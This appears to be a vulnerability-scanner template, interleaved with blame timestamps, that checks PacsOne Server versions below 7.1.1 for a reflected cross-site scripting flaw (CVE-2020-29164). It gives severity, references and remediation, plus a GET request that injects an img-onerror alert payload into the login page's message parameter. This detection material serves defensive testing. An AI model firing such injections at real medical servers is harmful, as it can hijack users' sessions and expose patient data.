2021-03-17 15:35:41 +00:00
id : CVE-2020-29164
info :
2022-08-16 14:14:41 +00:00
name : PacsOne Server <7.1.1 - Cross-Site Scripting
2021-03-17 15:35:41 +00:00
author : geeknik
severity : medium
2022-08-16 14:14:41 +00:00
description : PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d
2022-05-17 09:18:12 +00:00
- https://pacsone.net/download.htm
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-29164
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-29164
cwe-id : CWE-79
2023-10-22 12:16:24 +00:00
epss-score : 0.00205
2023-12-12 11:07:52 +00:00
epss-percentile : 0.58262
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : rainbowfishsoftware
product : pacsone_server
2023-12-05 09:50:33 +00:00
tags : pacsone,xss,cve,cve2020,rainbowfishsoftware
2021-03-17 15:35:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-17 15:35:41 +00:00
- method : GET
path :
2021-05-10 21:12:34 +00:00
- "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
2021-03-17 15:35:41 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-03-17 15:35:41 +00:00
words :
2021-03-17 18:35:04 +00:00
- "text/html"
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-03-17 18:35:04 +00:00
words :
- '<img src="" onerror="alert(1);">1</img>'
2021-05-10 21:18:45 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022100f552f25d105d8cb802826cdf1b9c9a61013ca50f08011ccdcdb0f7d174dd78bb022007b4da07afcad0d7f938c0e6610ad008c3c44dc1f5c29bf4961e1e39b78adb08:922c64590222798bb761d5b6d8e72950